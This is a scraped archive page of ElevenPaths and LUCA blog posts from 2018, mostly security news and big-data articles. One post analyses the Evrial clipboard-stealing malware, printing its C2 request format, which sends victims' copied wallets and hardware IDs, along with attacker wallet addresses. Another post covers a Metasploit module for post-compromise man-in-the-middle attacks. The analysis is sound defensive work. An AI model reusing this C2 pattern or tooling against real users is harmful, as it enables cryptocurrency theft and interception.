#CyberSecurityPulse: Biggest-Ever DDoS Attack Hits Github Website

ElevenPaths    6 March, 2018

At the end of 2016, a DDoS attack on DynDNS blocked major Internet sites such as Twitter, Spotify and PayPal. The Mirai botnet was used to take advantage of the full bandwidth of thousands of Internet-connected devices. However, last Wednesday 28th of February we witnessed the largest DDoS attack ever seen on the GitHub website, reaching a record 1.35 Tbps and 126.9 million packets per second.

Interestingly, the attackers did not use any botnets, but misconfigured Memcached servers to amplify the attack. Memcached operation is based on a distributed hash table. To prevent misuse of Memcached servers, administrators should consider firewalling, blocking or rate-limiting UDP on source port 11211 or completely disable UDP support if not in use. In this sense, Akamai estimates that at least 50,000 servers are vulnerable.


In fact, Arbor has confirmed this week a new attack with similar characteristics to the one perpetrated against Github, reaching 1.7 Terabits, 0.4 higher than last week. Although it has not communicated the name of the protected client, the company has indicated that it is a corporation based in the United States, which would have suffered from the same amplification vector of previous days relying on servers of the memcached type.

More information at GitHub

Top Stories

More Than $2 Million Worth of Bitcoin Mining Equipment Stolen in Iceland

The thieves stole a multitude of material including 600 graphics cards, 100 processors and 100 motherboards as well as many other mining hardware as was recorded by the security cameras of Advania, one of the companies that has been affected by two incidents in the last months. Iceland has become an interesting country for those engaged in cryptocurrency mining, considering that renewable energy, which represents almost the 100% of the energy generated in the country, is cheap and affordable. Police efforts are trying to track down the thieves by paying special attention to any spike in energy consumption all around the country in an investigation that remains open despite the first arrests already taking place.

More information at The Hacker News

German Government’s Stolen After Computer Infiltration

In December 2017 the German government identified a serious intrusion into systems and networks linked to its government. Spokesman Johannes Dimroth has confirmed this while added that it is being treated as a high-priority incident. Some other sources cite that the infection could have been active for a year. The German Ministry of Interior, has identified the culprits as being linked to APT28 (also known as Fancy Bears), a group allegedly linked to Russia after taking part in incidents such as the security breach of the Democratic Party prior to the last US presidential elections or the French elections held in 2017.

More information at Reuters

Rest of the Week´s News

Coinbase Will Send Data on 13,000 Users to IRS

Coinbase has now formally notified its customers that it will be complying with a court order and handing over the user data for about 13,000 of its customers to the Internal Revenue Service. The company, which is one of the world’s largest Bitcoin exchanges, sent out an email to the affected users on Friday, February 23. The case began back in November 2016 when the IRS went to a federal judge in San Francisco to enforce an initial order that would have required the company to hand over the data of all users who transacted on the site between 2013 and 2015 as part of a tax evasion investigation.

More information at Coinbase

US Intel Says Russia Launched False Flag Olympics Cyberattack

Russian military spies hacked several hundred computers used by authorities at the 2018 Winter Olympic Games in South Korea, according to U.S. intelligence. They did so while trying to make it appear as though the intrusion was conducted by North Korea, what is known as a false-flag operation, said two U.S. officials last week who spoke on the condition of anonymity to discuss a sensitive matter.

More information at Washington Post

A Simple Bug Revealed Admins of Facebook Pages

Egyptian security researcher Mohamed A. Baset has discovered a severe information disclosure vulnerability in Facebook that could have allowed anyone to expose Facebook page administrator profiles, which is otherwise not supposed to be public information. Baset said he found the vulnerability, which he described as a “logical error,” after receiving an invitation to like a particular Facebook page on which he had previously liked a post.

More information at Seekurity

Further Reading

UK Think Tanks Hacked By Groups in China

More information at BBC

Hacker Returns 20,000 ETH Stolen During CoinDash ICO

More information at ZDNet

New Attacks on 4G LTE Networks Can Allow to Spy on Users and Spoof Emergency Alerts

More information at Security Affairs

Sign up for our newsletter!

New tool: “Web browsers HSTS entries eraser”, our Metasploit post exploitation module

ElevenPaths    5 March, 2018
This module deletes the HSTS/HPKP database of the main browsers: Chrome, Firefox, Opera, Safari and wget in Windows, Mac and Linux. This allows an attacker to perform man in the middle attacks once a target has been compromised. It is available from the post exploitation module in Metasploit project.

During last years we have been researching about HSTS and HPKP, how it works from the server side, how it is implemented, how administrators deal with it and how browsers implement these mechanisms. We have even created tools and a test web page around it. Now, we add to our toolset a new script which has become a post exploitation Metasploit module.

Release notes imagen

During RootedCON (where we showed an improved version of our presentation in Black Hat) we have revealed that recently, our post exploitation module to erase HSTS/HPKP entries in main web browsers (coded by Sheila Berta, one of our researchers in Innovation and Laboratory in ElevenPaths), have been merged in official Metasploit repository.

How to use it is quite simple, it is shown in this video.

Hope you find it useful.

Innovation and laboratory

And the Oscar goes to… Data!

AI of Things    2 March, 2018
This weekend, the 90th Academy Awards will take place at the Dolby Theatre in Hollywood. More commonly known as the Oscars, these awards are the ultimate celebration of the best films of the previous year and yearly ranks as the most viewed awards show by number of viewers. Last year, over 34 million people tuned in (in the US alone) to watch Leonardo DiCaprio finally receive his first Best Actor Oscar and La La Land to incorrectly be announced as the winner of Best Film (before the prize was correctly handed over to Moonlight). Each year, plenty of “experts” try to predict the winners, but in this post, we will see how Big Data can be used to make predictions that are more accurate.

Using data to predict events has been going on for years, but saw a particular explosion of popularity when Nate Silver, an American statistician, correctly predicted 49 out of 50 states in the 2008 US Elections (he went one further in 2012 and predicted all 50). Silver’s own company FiveThirtyEight have been making predictions on the Oscars for many years. As we will see in this blog, there are a number of ways of predicting how the 7,258 odd Oscars votes will be cast, but FiveThirtyEight base their model of wins at previous awards (such as the BAFTAS).

As is explained in more detail in this article by the company themselves, a numerical score can be given to each award based on how often an individual or film has won that award as well as an Oscar. For example, the same Supporting Actor has won the Golden Globe and the Academy Award in 17 of the last 25 years (68% of the time). The fraction of 0.68 is squared to 0.46 and then multiplied to get a point score of 46. FiveThirtyEight predict Gary Oldman (The Darkest Hour), Frances McDormand (Three Billboards Outside Ebbing, Missouri) Allison Janney (I, Tonya) and Sam Rockwell (Three Billboards) to continue their winning streaks and The Shape of Water to win best picture. You can see the full details of the prediction here.

Seats in a cinema.
Figure 2 : Studies estimate that film studies spend up to $10m to help their hilm win an Oscar.
Moving back to 2015, let’s look at the methods of Ben Zauzmer, a Harvard student, which helped him predict 86% of all winners (including a 100% success in predicting the big four acting awards, best film and best director). According to Zauzmer himself, his models are based on “thousands of data points on Oscar ceremonies over the past two decades”. This example is a perfect example of Big Data analysis, which has the ability to draw out trends and “Insights” which would be hard to see with human analysis.

Other companies have taken a more behavioral approach to making predictions. For three consecutive years (2013 to 2015), digital advertising firm Exponential successfully predicted the recipient of the Best Picture award. In 2016, the award was hotly contested, with experts divided between Spotlight (the eventual winner), The Big Short and The Revenant. Exponential used big data, which included 10,116 different behavioral indicators, to correctly predict the winner for the fourth year running.

Popcorn on a black table
Figure 3 : Recent analysis has combined raw data with sentiment analysis (how movies make people feel).

A similar analysis was done by tech firms Cognizant and Clarabridge, whose sentiment analysis involved studying (among 150 different variables) 150,000 text reviews and 38 million star ratings on IMDB. Their algorithms (which use artificial intelligence and machine learning) can detect strong emotions such as anger, which (perhaps surprisingly) are good indicators of success. A good film will take its viewers on an emotional journey after all! Both of these companies predicted that The Revenant would win that year, which perhaps shows that pure data methods such as those used by FiveThirtyEight are more accurate.

As we have seen in these examples, Big Data analytics can be applied to much more than the world of business, and the Insights it produces can be incredibly accurate. We’ll have to wait and see if FiveThirtyEight’s predictions for this year are correct, but for now follow us on Twitter, LinkedIn and YouTube to keep up to date with all things LUCA.

An IoT that deserves an Oscar

Beatriz Sanz Baños    1 March, 2018

Connectivity has reached the film industry. The use of drones, virtual reality or beacon technology offers spectators the possibility of enjoying a much more complete audiovisual experience.

Big Data and the Blockchain phenomenon: Part II

AI of Things    28 February, 2018
Welcome back to the second half of this mini-series about the technological phenomena that is blockchain. In my previous post, we looked at how the technology works and some of it’s key benefits. If you haven’t yet had a chance to read it, we recommend you do so before continuing. Today, we widen the net to look away from cryptocurrencies and will see a variety of sectors that are adopting blockchain technology. Also, since our passion is Big Data, we will see how Big Data analytics can take blockchain even further. Shall we get started?
 

What can Big Data bring to the table?

 
As we saw previously, blockchain is a technology with which data can be stored across a “peer-to-peer” network. Each “block” contains a piece of information (e.g. a financial transfer or sales figures) and once verified by each party in the network, it can be added to the existing chain. As you can probably imagine, blockchains can become extremely long, containing huge amounts of information. Given the progress we are seeing in areas such as the Internet of Things (IoT), data quantities will continue growing at an exponential rate. To give you a bit of perspective, it is predicted that there will be 21 billion connected devices by 2020!

 

An Amazon Echo Dot
Figure 1 : Amazon are one of a number of companies creating connected devices.
     
All of this presents both a challenge and an opportunity. For companies in any sector, more data is likely to mean a greater understanding of customers, suppliers and their own business. However, simply having the data is not enough; it must be processed and analyzed in order to extract value. This is where the Big Data analytics, such as those we use at LUCA, enter the picture. Such analytics make it possible to identify patterns in the data and the fact that blockchains contain all historical data means that these “insights” can be extracted with greater precision. Another benefit of Big Data analysis is in the detection of fraudulent transactions; it is able to detect when a new entry to the blockchain is anomalous and likely to be invalid. 
 
Essentially, the two technologies can go hand in hand, with blockchain allowing data to be stored in a transparent and secure way and big data analytics then extracting valuable insights from this information. This partnership has incredibly potential value – it has been estimated that “the blockchain ledger could be worth up to 20% of the total big data market by 2030, producing up to $100 billion in annual revenue.” 
 

Who can benefit from blockchain?

 
As mentioned in the first part of this mini-series, cryptocurrencies (such as Bitcoin and Ethereum) were the early adopters of blockchain technology and they often receive the most attention. However, an increasing number of industries are moving in to the blockchain space for fear of missing out. Here are five interesting examples:
  • Healthcare – 2017 saw an unprecedented rise in healthcare cyber-attacks, including ones targeting the NHS in the UK and a variety of providers in the US. In the healthcare sector, due to the delicate nature of information, good management of patient data is paramount. Mismanagement can lead to misdiagnosis since different “touchpoints” may end up having differing patient records. Blockchain, as we saw previously, involves a “distributed ledger” which means that each touchpoint (GP, A+E etc) would have an up-to-date copy of patient information. This not only improves accuracy of information but can reduce the risk of hacks too, since each node in the peer-to-peer network must validate any change to the blockchain.
 
  • Governments – High profile claims of voter fraud have plagued elections in recent times. For example, Donald Trump said (without evidence) that between 3 and 5 million people cost him the popular vote in the 2016 elections by voting illegally. The traditional system of manually counting votes seems to have had its day. With blockchain technology, identity can be verified at the point of registration and voting could be done electronically. In this way, there would be a public ledger of all recorded votes and fraudulent votes would be removed. Check out Follow My Vote to see an example of how this could work. Governments can also by slow, opaque and full of bureaucracy and block-chain based systems could make them transparent to the public and increase trust. Dubai plans to put all government documents on the blockchain by 2020.
 
Photo of an entrance to a polling station
Figure 2 : Physical polling stations may be replaced by online voting systems based on blockchains.
 
    
  • Design – One of the issues facing graphic designers and other content creators is the large amount of processing power that is required to work on, render and export their creation. The startup Golem describes themselves as a “decentralized supercomputer“, and their service involves the sharing of spare computing resources. Suppliers install a plugin which analyzes how much spare capacity (in terms of processing etc) they are running with and then offers this excess to those who need it. The plugin is non-intrusive and is currently applied to CGI rendering with future applications that will include Machine Learning and more.
 
  • Real Estate – Buying and selling houses often involves a very slow process full of unexpected additional fees. A system based on blockchains would significantly speed up the process since it would remove the need for paper-based records. Fees would also be reduced since blockchains reduce the need for third parties. Ubitquity is an example of a company working in this area.
 
  • Charity – In this area, the greatest complaint is that inefficiencies and corruption exists which mean that your donations don’t reach those that need them most. For example, text based donations can occassionally take a small percentage of the donation to pay for the service. Since blockchain technology is fully end-to-end, donors would be able to fully trace where their money goes. Comapnies such as the BitGive Foundation are using Bitcoin to do this.
These five examples are just a snapshot of the bigger picture, for a more comprehensive list of industries adopting blockchain check out this YouTube video and this infographic. What do you think will happen in the coming months and years? Is your industry adopting blockchain yet? To keep up to date with all thing LUCA and Big Data, don’t forget to follow us on Twitter, LinkedIn and YouTube.

 

Evrial, malware that steals Bitcoins using the clipboard… and the scammed scammers

ElevenPaths    26 February, 2018
Evrial is the latest cryptocoin malware stealer, and uses the power to control the clipboard as its strongest bet to get “easy money”. Elevenpaths has took a deep technical dive into the malware itself, to show how it technically works, with a quite self-explanatory video. Aside, we have followed the steps of its Russian creator and found that whoever he is… scammed the scammers themselves.

Qutra, the creator, selling its malware


In the beginning we had Cryptoshuffle, by the end of 2017. It was some malware able to steal the clipboard and modify the cryptocoin address in it. But a bit later, someone saw some business in it and started to sell the platform itself calling it “Evrial”. That was around the beggining of 2018 when Cryptoshuffle started to “disappear” and Evrial saw light. It was a .NET malware able to steal passwords from browsers, FTP clients, Pidgin and, the best part, able to modify the clipboard on the fly and change any cryptocurrency address to whatever address you wanted to. So, the malware is checking the format of whatever is in the clipboard. If the victims copies for example a Bitcoin or Litecoin address, it is quickly replaced by another, on the fly and dynamically (the ew address is requested to a server).

Taking the address from a server and setting the clipboard

Evrial allows the attacker to control it all from a comfortable panel where the stolen data is available. When the attacker buys the application, he can set his “name” for logging into the panel (that will be hardcoded in the code, so the Evrial version is unique for him).

Control panel used by the attacker to advertise the malware and by the buyers to administrate their “loot”

For example, in an infected computer, everytime a wallet is copied into the clipboard, a request to a specific server owned by the attacker is done. This is the format:

C2domian.com]/shuffler.php?type=BTC&user=ATTACKER&copy=[WhateverWalletIsCopiedInTheClipboard]&hwid=[UniqueNumberForTheVictim]

Where “type” may be BTC, LTC, ETH, XMR, WMR, WMZ or Steam. The server will respond with an address.

What is it useful to?

When you want to make a, let’s say, Bitcoin transfer, you usually copy and paste the destination address… if it is switched “on the fly” the attacker expects that the user, unwittingly and trusting in the clipboard action, confirms the transaction, but to his own wallet. That is the trick.

This is a video that shows how it works.

And this is it again with some technical details.

Some curious things

We have found several versions of the malware. They all are disguised in a process faking a different process in the description.

567.exe is the process monitoring the clipboard

It runs every time the computer starts up (hidden in a registry call to %appdata%). It is written in .NET and some versions are “shielded” so it is harder to analyze, but some not. The C&C domain is taken from someplace in github everytime it runs.

This is the main domain for the malware right now

If you copy the same address the server returns to the clipboard… (so the attacker one) it just deletes your clipboard

Who is behind Evrial?

The author itself exposes his username in Telegram: @Qutrachka. The account is in the source code in order to be able to contact him. Using this information and some other analysed samples, it has been possible to identify users in different deep web forums under the name Qutra whose main objective is to sell this malicious software.

In the links above, there are also evidences that CryptoSuffer malware was linked to the same threat actor after identifying a publication in pastebin explaining the functionalities of this family and published under the same user.

Some days after trying to sell it from some of those forums, the user Qutrachka has been banned. Why?

The user Qutra banned from the forum he used to try to sell the malware

The scammed scammers?

The “user” field in the requests is quite interesting. We have found several different names in the several samples we have analyzed:

Itakeda, Plaka, depr103, onfrich, fr3d, ogus, xandrum, danildh, crypto368, knoxvile, hyipblock, fast63, spysdar, zheska, medols1, raff, desusenpai…

It is not hard to find that these nicknames are as well, users in Bitcoins related webs or Steam forums (remember that Evrial steals payments in this platform too).

Nicknames of users found to be in the “user” field in the malware forum
(so, potential buyers) are as well easy to find in bitcoins and Steam related forums

Supposedly, people that brought the malware to Qutrachka, received a compiled version esclusively for them and their names were hardcode. So the “scammers” should just adjust the cryptocoin address that the server returns to their own, and start getting some revenue from buying the program… that is how it should be, right? But this is not the case. Remember this URL?

[C2domian.com]/shuffler.php?type=BTC&user=ATTACKERBUYER&copy=[WhateverWalletIsCopiedInTheClipboard]&hwid=[UniqueNumberForTheVictim]

The problem is that, right now, whatever “user” you insert, the returned address is always the same… the one belonging to Qutrachka and the original one in the earlier versions of the malware. So, our theory is: Qutrachka just changed the server so, for every request made, the address the C&C retruns are his own… So, maybe, he has scammed the scammers.

How much did he win so far?

What we have done as well is modify the header so we get all the accounts from different cryptocurrencies.

[C2domian.com]/shuffler.php?type=BTC&user=ATTACKER&copy=[WhateverWalletIsCopiedInTheClipboard]&hwid=[UniqueNumberForTheVictim]

We requested different “types” changing it to BTC, LTC, ETH, XMR, WMR, WMZ or Steam. These are the results:

  • LTC: LiHcBT4ag4wGi4fDt5ScXuxvjKTcp9TeG2
  • BTC: 12MEp1W6EBdUEcmbhg4qJfaTB5bCNPtLHh
  • ETH: EO0x79ee1da747057c221680f94b7982ba4f3f05b822
  • XMR:4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nU  MXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQp4nTDUPjYLQJVQKcA
  • WMR: R262605493266
  • WMZ: Z924876540636

And now we are able to guess how much it is in every wallet. He has received a total of 21 transactions into the Bitcoin wallet, supposedly from his victims, collecting approximately 0.122 BTC. If ransomware attackers wallets usually receive the same amount from its victims, here of course the range is wider and payments are all different.

Bitcoins earned as of the end of February

The attacker has moved all the money to several addresses to try to blur the trail of his payments. The attacker has received 0.0131 Litecoins as well, and that amount is still available in his wallet. On the other hand, it has not been possible to track payments related to his Monero account, as well as if he had received money to his various Webmoney accounts (WMR and WMZ). We do not know about the Ethereum account either.

Innovation and laboratory
[email protected]

Miguel Ángel de Castro Simón
Senior Cybersecurity Analyst at ElevenPaths

One day Artificial Intelligence could save your life

AI of Things    21 February, 2018
Intensive Care Units… a place where decisions have to be instant and accurate. Any error can result in a loss of life. That’s why Clew Medical have been conducting research and testing in this field, with the aim of optimizing decisions through the power of Data and Artificial Intelligence. In 2014 the value of AI in medicine was found to be $600 million and by 2021 this figure is expected to rise to $6.6 billion.

Clew Medical is a company that develop and produce programs that harness the power of Artificial Intelligence in order to identify ‘high-risk’ patients at Intensive Care Units (ICUs). The idea behind this is to intervene as early as possible and to give patients the highest chance of survival and ultimately recovery possible. Currently, doctors often rely on visual signs and frequently at this stage it is already too late to take action. This system of ‘evidence-based medicine’ is extremely effective in general, however, in times where urgent and instant care is required, it does not function as effectively as possible and can lead to loss of life that would have otherwise been preventable.
The Artificial Intelligence technology has the capability to warn and advice doctors significantly before there is a need for urgent care. The software does so by connecting to the central ICU systems and therefore it has access to hundreds of metrics such as blood pressure, heart rate etc. and these variables refresh every few seconds. The information is then crossed with data from individual patient records and abnormalities are highlighted instantaneously… significantly faster than humanly possible.
Clew Medical also take advantage of the cloud by comparing patient situations with similar historical cases. All previous data is stored in the cloud, both successful cases and errors. This allows for successful methods to be repeated and errors to be ironed out of the system, especially if it adopted in more Intensive Care Units across the world. Currently, the system is in place in only a handful of hospitals across Israel and the United States.

Ultimately the system will improve quality of care and at the same time reduce the workload on heavily overworked doctors and nurses. It will allow them to optimize their time planning and resource management as the software will be able to identify the patients who require the most attention. When a patient is in a fully stable condition, they will not require around-the-clock care and attention whereas previously with a standard evidence-based model, time would have been lost here.
Image of man testing blood pressure
Figure 2 : Blood pressure along with heart rate are monitored continuously
At this stage, the company has had a 99% focus on the ICU area of medicine, as they believe that this area will benefit the most from the groundbreaking technology. However, in the future, once the software has proven its worth and further developed, there is nothing stopping it from being introduced to rest of the medical field and reducing stress on all hospital workers.
There are many fears in the modern era that the force that is Artificial Intelligence and robots will take over human jobs in the near future. However, this example shows how this innovative technology can in fact aid doctors to improve the quality of care for those in greatest need. Here at LUCA, we believe in the potential of data and Artificial Intelligence in creating a better world for all.

#CyberSecurityPulse: Dude, Where Are My Bitcoins?

ElevenPaths    20 February, 2018

Numerous types of attacks are affecting cryptocurrency users: families of malware that steal wallets, phishing attacks that try to forge platforms where users manage their bitcoins, applications that use the CPU of users to mine… And, in addition, those that prefer to manage their own money without delegating responsibility to a third party they will also have to deal with the problem of losing private keys or not remembering the password with which we protected the wallet.

If it has happened to you and you have protected your wallet with a password, maybe you do not have everything lost. John the Ripper, a password cracking software tool, contains plugins that crack differents wallets: bitcoin2john, blockchain2john, electrum2john, ethereum2john and multibit2john. In the first place, we will have to select the type of plugin that we are going to use depending on the type of wallet that you are using. Then, you pass that content to a text file, launch John The Ripper ./john with the file name and, finally, cross the fingers!


According to a study conducted by The Genesis Block in 2016, 35% of bitcoins existing at that time had not been used in transactions since 2011. According to them, the majority could correspond to lost bitcoins. Without a doubt, Bitcoin has left many billionaires behind who could have been but who have carelessly lost their money.

Top Stories

Water Utility in Europe Hit by Cryptocurrency Malware Mining Attack

Security firm Radiflow discovered cryptocurrency mining malware was found in the network of a water utility provider in Europe. The attack is the first public discovery of an unauthorized cryptocurrency miner impacting industrial controls systems (ICS) or SCADA (supervisory control and data acquisition) servers. Kfir, CTO at Radiflow, explained that Radiflow is still in the early stages of the investigation, but so far has been able to determine that the cryptocurrency mining software was on the water utility’s network for approximately three weeks before it was detected.

More information at Eweek

Olympic Destroyer Takes Aim At Winter Olympics

Sunday 11th February the Olympic games officials confirmed a cyberattack occurred but did not comment or speculate further. The samples identified, however, are not from adversaries looking for information from the games but instead they are aimed to disrupt the games. The samples analysed appear to perform only destructive functionality. There does not appear to be any exfiltration of data. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment.

More information at Talos Intelligence

Rest of the Week´s News

Grammarly Patches Chrome Extension Bug That Exposed Users’ Docs

Grammarly has fixed a bug with its Chrome browser extension that exposed its authorization tokens to websites, allowing sites to assume the identity of a user and view their account’s documents. “I’m calling this a high severity bug, because it seems like a pretty severe violation of user expectations,” said Tavis Ormandy, a researcher at Google’s Project Zero, in a Feb. 2 forum post. “Users would not expect that visiting a website gives it permission to access documents or data they’ve typed into other websites.”

More information at Threat Post

Hackers Exploit Telegram Messenger Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The flaw has actively been exploited in the wild since at least March 2017 by attackers who tricked victims into downloading malicious software onto their PCs that used their CPU power to mine cryptocurrencies or serve as a backdoor for attackers to remotely control the affected machine.

More information at Securelist

Hackers Exploiting Bitmessage Zero-Day to Steal Bitcoin Wallet Keys

Bitmessage developers have warned of a critical ‘remotely executable’ zero-day vulnerability in the PyBitmessage application that was being exploited in the wild. According to Bitmessage developers, it affects PyBitmessage version 0.6.2 for Linux, Mac, and Windows and has been exploited against some of their users. “The exploit is triggered by a malicious message if you are the recipient (including joined chans). The attacker ran an automated script but also opened, or tried to open, a remote reverse shell,” Bitmessage core developer Peter Šurda explained in a Reddit thread.

More information at Bitmessage

Further Reading

An APFS Filesystem Flaw Could Lead MacOS Losing Data Under Certain Conditions

More information at Bombich Software

JenkinsMiner Made $3.4 Million in a Few Months by Compromising Jenkins Servers

More information at CheckPoint

Coinhoarder Criminal Gang Made an Estimated $50 Million With a Bitcoin Phishing Campaign

More information at Cyberpolice Ukraine

Sign up for our newsletter!

Elena Gil, CEO of LUCA speaks to us about the potential of Big Data in business

AI of Things    16 February, 2018
“We are just beginning to see the opportunities that Big Data represents”
The importance of data when making any decision is growing. Elena Gil, CEO at LUCA, Telefonica’s data unit, spoke to us on this occasion about the inherent opportunities of Big Data, which has also seen new professions and the development of specific skills that, to this day, are hard to find.

The term Big Data has gained relevance in recent years and today, there are few people who have not heard of it. Data analysis helps to predict consumer demands, forecasting their desires and anticipating their actions. For example, some consultants or advisors are sure that, in the short run, the process of buying will not be generic but instead, personalized for each user. A key factor for businesses’ competitiveness is that they trust in their backing of Big Data for positioning in the most efficient and profitable way for their products and services.

Data has become a fundamental asset and, despite the fact that few invest in it, the percentage of those who plan to do so in the near future is significant.

It’s a future where STEM studies (Science, Technology, Engineering and Mathematics) will become the most demanded in a market that has found a trustworthy niche in technology to exploit, with its most stable backing in Big Data. In fact, currently, it is hard to find profiles experienced in Big Data that undeniably will be essential in the work environment in the short and mid-term.

We now have a data universe that has filtered into almost every aspect of life and that has a greater presence than what society imagines. Therefore, security has become a critical area, where evidence is vital to avoid greater evils. In fact, there are consultants that claim that in the short and mid-term, virtual viruses may cause real illnesses in the future through the vulnerability of advanced data systems.

Data, data and more data that needs adequate processing to extract the maximum value to fit it to people and their needs.
Under the flag of data analysis LUCA was born, Telefonica´s Big Data unit that has recently celebrated its first anniversary. A good part of the credit for the development and consolidation of LUCA is thanks to its CEO, Elena Gil. Also the global director of Big Data B2B at Telefonica, she has been with the unit since its birth and will be in the future as well, with the company defining itself as one of the largest data investors. Additionally, Elena is a great driving force for the presence of women in STEM and her journey is a great example of that. After graduating in Economics and business management, she obtained an MBA from MIT, demonstrating from the very beginning an interest in the technological world.

The current and future development of Big Data, its opportunities and the reality that the sector is experiencing are the key points in this interview between BlogThinkBig.com and the data expert from LUCA.

Complementarity as the key to success

Elena Gil begins by recalling that the pioneering sectors in the world of Big Data have been those that were and are more “intensive in the generation of data”. But the present and future of the sector are wider than you could think, and its development reaches from financial entities, telecommunications or healthcare to other areas such as transport, energy and industry. The CEO of LUCA understands that in general, any company can utilize Big Data, “above all, hand in hand with the development of Internet of Things (IoT)”.

“The connection of devices will allow the transformation of many sectors”, assured the director of Telefonica’s data unit, which trusts in the complementarity and coordination of different technologies as a bet for the future. Artificial Intelligence, Internet of Things, Cloud, etc. are technologies that “complement and strengthen each other”, and where “Big Data is critical for their development”.

Elena tells us how "the connection of devices will allow the transformation of many sectors".
Figure 2 : Elena tell us how “the connection of devices will allow the transformation of many sectors”.

Security, Privacy, a constant challenge

A connected industry with a universal goal: security. In fact, as Elena Gil explains this is a “critical” and essential theme. And that aligning a company’s strategy with security has become an essential question to deal with attacks and breaches.

And in this area, in spring this year a new law will be implemented universally throughout Europe known as GDPR (General Data Protection Regulation) that will regulate adaptation and organizations’ correct use of data. “It will be a challenge for companies because we have to adapt, but also it protects the interests of the final users”, claims Elena Gil who additionally, highlights at this point the alignment of Telefonica with the principals of transparency, promise and integrity that GDPR will represent.

The European project develops in parallel with the White Papers on artificial intelligence that will also be presented this spring. An initiative driven by Secretary of State for Information and Digital Agenda, that consists of a group of multidisciplinary experts involved in its structuring: nine experts from the academic, business and institutional worlds, amongst which Elena Gil (Telefonica), Elena Alfaro (BBVA), Lorena Jaume-Palasí (University of Berlin and Algorithm Watch) and Miguel Luengo-Oroz (United Nations, UN Global Pulse).
“They want to present a book that presents Artificial Intelligence in Spain, that contains the legal, social and ethical implications that are believed to be of importance so that the country becomes a benchmark in terms of Artificial Intelligence”, because, just like the CEO of LUCA assured, “that will depend on the country’s competitiveness in both the short and mid-terms”.

A regulation that has become necessary given the large number of data that makes up people’s lives. “Big Data and Artificial Intelligence are in our day to day lives without us being aware of them, and we are only starting to see the potential that they represent”, claimed Elena Gil. She put specific emphasis on the importance of proper data management. And that, the positive implications that Big Data brings with it, could be seen as risks if they are not treated in the correct way.

Incorporating the world of data into businesses is and will be an important change that “should be made in the proper way and extract all of its potential. Democratizing access to data is the objective to reach, and therefore the capacity of processing will be essential. “What stands in front of us is so huge that it is very difficult to know when it will reach a maturity” adds Elena Gil and that “we are not even able to imagine everything that Big Data will offer us in the future”.

Personalized Shopping, the future challenge

Being attended 24 hours a day is a reality to which society is accustomed to. Clients are becoming more demanding and they search for a greater personalization because “they are no longer satisfied with an average offer”. Better understanding clients is the challenge faced by companies. Therefore, LUCA is using the experience and capabilities of Telefonica in order to help, in the best way possible, companies are supported by data.
Elena explains the need for greater personalization as consumers "are no longer satisfied with an average offer"
Figure 3 : Elena explains the need for greater personalization as consumers “are no longer satisfied with an average offer”.

A series of future challenges for which Elena Gil believes that companies have to adapt their organizations to two types of necessary resources. Firstly, there are the Big Data and Artificial Intelligence specialists, such as the data scientists, data architects or data engineers. It’s about “rare critical profiles”, that are responsible for ensuring that the companies have adequate storage and processing capabilities and the development of algorithms and models. Additionally, it is necessary to have less technical profiles that work with data in other disciplines such as marketing specialists or financial areas. The implication and coordination of all of this will be necessary to propel a “cultural change” that allows the “extraction of value that these technologies are bringing”

Main trends for 2018

Big Data, along with Artificial Intelligence, defined technological trends in the recent years and in 2018, this will not change. As the CEO of LUCA assures “this year there will be an advance in the real-time decision-making process”. Other technologies such as the Cloud, Machine Learning or Deep Learning are “opening horizons” for Big Data. There are always more areas for development, for example chatbots, “that are revolutionizing the customer’s commercial attention” and in this way achieving a “greater satisfaction”.

Predictions

But not all data collected is useful. According to a report published by Cisco, the majority of data that we will work with, in 2020, will be short-lived, and that only 10% will be useful for businesses. A prediction that Elena Gil is cautious about and prefers not to anticipate. “It is certain that the data explosion is huge” and it will amplify further in the future with the development of IoT, but also is true that “it will become more and more ephemeral”. According to the CEO of LUCA, the existing trend focusses more on the analysis of data at the source. If they are used then they will be of benefit, if not then they will disappear. A fact that will make information storage a selective process for businesses. However, as the Big Data expert recalls, it is still too early to make predictions.

SMEs and startups are knocking on the door

In the business panorama, in general, the percentage of investment in Big Data is advancing with giant steps, although the proportion remains low. SMEs and startups seem more reluctant to take a chance with it, perhaps due to the financial outlet that is assumed, or out of fear and a lack of knowledge on the topic. An issue that Elena Gil encourages businesses to try, as “it is more and more accessible” and there are “models such as Cloud and “as a service” that allows them to not make investments and only use what they need at any time”, said the director of LUCA, highlighting the scalability of Big Data. “It allows you to start in a small ecosystem, try and demonstrate that it has value without needing to make big decisions before seeing its advantages”.

And on this topic, Elena Gil encourages a “loss of fear” to invest in data as long as you what you want to use it for. “It is important that Big Data is at the service of the company’s interests”, reminds the director of LUCA, for whom a hopeful future will arrive. A future where ethics and regulation will take a special role to improve and try to strengthen the presence and efficiency of Big data in society. 
Original content in Spanish written by Marta Nieto from Blog Think Big

“Truly the Matrix, minus the human batteries”

Beatriz Sanz Baños    15 February, 2018

The Fourth Industrial Revolution is about much more than just applying today’s technology to industries. It’s about integrating intelligent cyber-physical systems such as AI and machine learning along with cybersecurity, blockchain, the Internet of Things, robotics, quantum computing, advanced materials… and much more. In return, it promises to revolutionize the world as we know it. We asked Scott Amyx, the author of Strive: How Doing the Things Most Uncomfortable Leads to Success and a global thought leader in industry about how this will affect the future of the IoT. This is what we found out from this interesting chat.  

The “subtle” role of the IoT in Industry 4.0

“Perhaps to the surprise of some readers, disruptive technologies rarely work in isolation,” the expert told us, talking about the relationship between the IoT and the new Industrial Revolution. “It’s the convergence of these technologies that drives up the innovation.” And both industry and the IoT are flip sides of the same innovation coin.

The IoT, in particular, plays a critical role in several ways, explained Amyx. “The first is the ability to quantify inanimate and animate objects to build a real-time data matrix of the world. That means that we will generate incredible volume, variety, and velocity of data from the environment, natural resources, buildings, cars, cities, and homes .” The interviewee called them “the 3Vs.” But delving deeper into that theme, we also have to talk about certain applications.

“That data, in turn, feeds neural networks to understand patterns and create probabilistic predictions of possible future scenarios,” explained Amyx. “This informs businesses, governments, NGO’s, and people so they can make real-time, fact-based decisions that drive up optimization, productivity, and efficiency while lowering costs and mitigating potential risks and issues.”

“We’ve moved beyond networks and cables to real time”

